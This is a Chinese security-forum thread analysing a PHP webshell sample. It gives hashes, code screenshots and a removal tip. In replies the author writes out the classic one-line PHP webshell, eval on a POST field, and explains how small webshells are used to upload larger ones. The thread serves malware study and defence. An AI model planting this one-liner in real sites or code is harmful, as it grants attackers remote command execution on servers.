吾爱破解 - 52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 6656|回复: 57
收起左侧

[PC样本分析] php大马分析

  [复制链接]
hackerbob 发表于 2022-4-23 15:52
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子!
病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途!
禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!
本帖最后由 hackerbob 于 2022-4-24 10:49 编辑

前言

此样本来源于:https://www.52pojie.cn/thread-1605321-1-1.html
这是我第一次分析,如果有误,请见谅
代码解释我写在图片上了

基本信息

样本名称
ac40dd370da655a49f3a1bb5055d6d7c92d1ae83bb9ec22b336a8a4301389131-1650698200
样本类型
PHP script, UTF-8 Unicode text, with very long lines, with CRLF line terminators
样本大小
66833
MD5
7ab1d9920958c35dc39b5e31ac1977b1
SHA1
8be2245992597a0734598f94be53927b8e6fa190
SHA256
ac40dd370da655a49f3a1bb5055d6d7c92d1ae83bb9ec22b336a8a4301389131
SSDeep
1536:OwUo+ZWXUq/qq1te+OZgNoL8QJfQYxUg1PryWC9a:OC+ZWXQ+OZgNMdxUg1PryWC9a

代码分析

Snipaste_2022-04-23_15-12-53.png
Snipaste_2022-04-23_15-14-28.png
Snipaste_2022-04-23_15-23-39.png
Snipaste_2022-04-23_15-23-59.png
Snipaste_2022-04-23_15-24-16.png
Snipaste_2022-04-23_15-25-28.png
Snipaste_2022-04-23_15-25-50.png
Snipaste_2022-04-23_15-27-41.png
Snipaste_2022-04-23_15-27-51.png
Snipaste_2022-04-23_15-28-04.png
Snipaste_2022-04-23_15-28-29.png
Snipaste_2022-04-23_15-29-22.png
Snipaste_2022-04-23_15-30-01.png
Snipaste_2022-04-23_15-32-46.png
Snipaste_2022-04-23_15-51-20.png

运行大马

Snipaste_2022-04-23_15-43-53.png
Snipaste_2022-04-23_15-45-07.png
Snipaste_2022-04-23_15-48-46.png
Snipaste_2022-04-23_15-49-51.png
Snipaste_2022-04-23_15-50-13.png

解决方案

还能咋解决?又不能传染,直接把php文件删了!!

最完美的解决方案

2018812058031162.gif
201204111137449312.gif


此大马不兼容新版本的php,我是用php5运行起来的
请勿用于非法用途

icomoon.7z

14.53 KB, 下载次数: 82, 下载积分: 吾爱币 -1 CB

原样本 密码:52pojie

免费评分

参与人数 13威望 +1 吾爱币 +30 热心值 +12 收起 理由
Hmily + 1 + 20 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
冷柠 + 1 + 1 谢谢@Thanks!
h404ack + 1 + 1 谢谢@Thanks!
tsecond + 1 + 1 我很赞同!
happyBread + 1 + 1 我很赞同!
hnwang + 1 + 1 我很赞同!
hwq + 1 + 1 用心讨论,共获提升!
daxiang789 + 1 用心讨论,共获提升!
Zllggggg + 1 用心讨论,共获提升!
kk1212 + 1 + 1 谢谢@Thanks!
Autom + 1 + 1 用心讨论,共获提升!
独孤~至尊 + 1 + 1 鼓励转贴优秀软件安全工具和文档!
lizf2019 + 1 感谢楼主解惑

查看全部评分

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

 楼主| hackerbob 发表于 2022-4-23 16:15
本帖最后由 hackerbob 于 2022-4-23 21:03 编辑
lizf2019 发表于 2022-4-23 15:59
请问楼主大马和小马是什么区别

大马功能齐全,甚至可以控制整个网站,但体积很大,如果网站对上传的大小和后缀有限制,那么就无法上传,于是小马就诞生了,小马的作用就是为了上传大马,功能通常只有文件上传,还可以把一句话木马嵌入图片中,制成图片马,通过工具远程连接
典型的一句话木马
[PHP] 纯文本查看 复制代码
<?php eval ($_POST["pass"]); ?>

用eval函数运行提交的字符串,$_POST["pass"]用来读取表单pass项的数据

免费评分

参与人数 2吾爱币 +3 热心值 +2 收起 理由
honglou + 1 + 1 已经处理,感谢您对吾爱破解论坛的支持!
lizf2019 + 2 + 1 谢谢@Thanks!

查看全部评分

lizf2019 发表于 2022-4-23 15:59
xglys 发表于 2022-4-23 16:12
头像被屏蔽
一只小木木 发表于 2022-4-23 17:26
提示: 作者被禁止或删除 内容自动屏蔽
a485537 发表于 2022-4-23 19:11
谢谢大佬
zhaiker521 发表于 2022-4-23 20:17
还是中国菜刀好用 一句话  一句话变种  一句话加密变种
chinasmu 发表于 2022-4-23 20:45
hackerbob 发表于 2022-4-23 16:15
大马功能齐全,甚至可以控制整个网站,但体积很大,如果网站对上传的大小和后缀有限制,那么就无法上传, ...

请问什么是一句话小马,是哪句话
 楼主| hackerbob 发表于 2022-4-23 21:03
chinasmu 发表于 2022-4-23 20:45
请问什么是一句话小马,是哪句话

这句话:
[PHP] 纯文本查看 复制代码
<?php eval ($_POST["pass"]); ?>

用eval函数运行提交的字符串,$_POST["pass"]用来读取表单pass项的数据
tony1990 发表于 2022-4-23 21:17
收藏了,原来应急搞得大马用了好久。
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则

返回列表

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2024-11-24 10:51

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表